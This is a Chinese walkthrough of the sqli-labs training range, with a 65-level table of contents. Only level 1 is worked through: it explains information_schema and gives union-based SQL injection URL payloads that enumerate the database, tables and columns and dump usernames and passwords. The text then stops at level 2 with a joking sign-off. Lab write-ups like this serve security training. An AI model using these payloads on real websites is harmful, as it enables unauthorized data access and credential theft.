目录
mysql数据结构
1.sqli-labs第一关
1.1判断是否存在sql注入
1.2 联合注入
2.sqli-labs第二关
3.sqli-labs第三关
4.sqli-labs第四关
5.sqli-labs第五关
6.sqli-labs第六关
7.sqli-labs第七关
8.sqli-labs第八关
9.sqli-labs第九关
10.sqli-labs第十关
11.sqli-labs第十一关
12.sqli-labs第十二关
13.sqli-labs第十三关
14.sqli-labs第十四关
15.sqli-labs第十五关
16.sqli-labs第十六关
17.sqli-labs第十七关
18.sqli-labs第十八关
19.sqli-labs第十九关
20.sqli-labs第二十关
21.sqli-labs第二十一关
22.sqli-labs第二十二关
23.sqli-labs第二十三关
24.sqli-labs第二十四关
25.sqli-labs第二十五关
26.sqli-labs第二十六关
26-a.sqli-labs第二十六-a关
27.sqli-labs第二十七关
27-a.sqli-labs第二十七-a关
28.sqli-labs第二十八关
28-a.sqli-labs第二十八-A关
29.sqli-labs第二十九关
30.sqli-labs第三十关
31.sqli-labs第三十一关
32.sqli-labs第三十二关
33.sqli-labs第三十三关
34.sqli-labs第三十四关
35.sqli-labs第三十五关
36.sqli-labs第三十六关
37.sqli-labs第三十七关
38.sqli-labs第三十八关
39.sqli-labs第三十九关
40.sqli-labs第四十关
41.sqli-labs第四十一关
42.sqli-labs第四十二关
43.sqli-labs第四十三关
44.sqli-labs第四十四关
45.sqli-labs第四十五关
46.sqli-labs第四十六关
47.sqli-labs第四十七关
48.sqli-labs第四十八关
49.sqli-labs第四十九关
50.sqli-labs第五十关
51.sqli-labs第五十一关
52.sqli-labs第五十二关
53.sqli-labs第五十三关
54.sqli-labs第五十四关
55.sqli-labs第五十五关
56.sqli-labs第五十六关
57.sqli-labs第五十七关
58.sqli-labs第五十八关
59.sqli-labs第五十九关
60.sqli-labs第六十关
61.sqli-labs第六十一关
62.sqli-labs第六十二关
63.sqli-labs第六十三关
64.sqli-labs第六十四关
65.sqli-labs第六十五关
mysql数据结构
在练习靶场前我们需要了解以下mysql数据库结构,mysql数据库5.0以上版本有一个自带的数据库叫做information_schema,该数据库下面有两个表一个是tables和columns。tables这个表的table_name字段下面是所有数据库存在的表名。table_schema字段下是所有表名对应的数据库名。columns这个表的colum_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对应的数据库。了解这些对于我们之后去查询数据有很大帮助。我们前面机关讲解比较详细后面就比较简单了。
1.sqli-labs第一关
1.1判断是否存在sql注入
1.以数字作为参数,判断其页面是否有变化,接下来以?id=1为例。
2.判断它是数字型还是字符型
1.2 联合注入
1.使用order by去看它的表有几列,找出错和没出错的中间那个没出错的
?id=1' order by 3--+
2.看页面回显位置
?id=-1'union select 1,2,3--+
3.接下来就是去看数据库名
?id=-1%27union%20select%201,2,database()--+
4.看看这个数据库下的表
?id=-1%27union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27--+
5.找字段名
?id=-1%27union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27--+
6.我们要username和password
?id=-1%27%20union%20select%201,2,group_concat(username,%27~%27,password)%20from%20users--+
2.sqli-labs第二关
今天周一,打周本了。拜拜(QAQ)。。。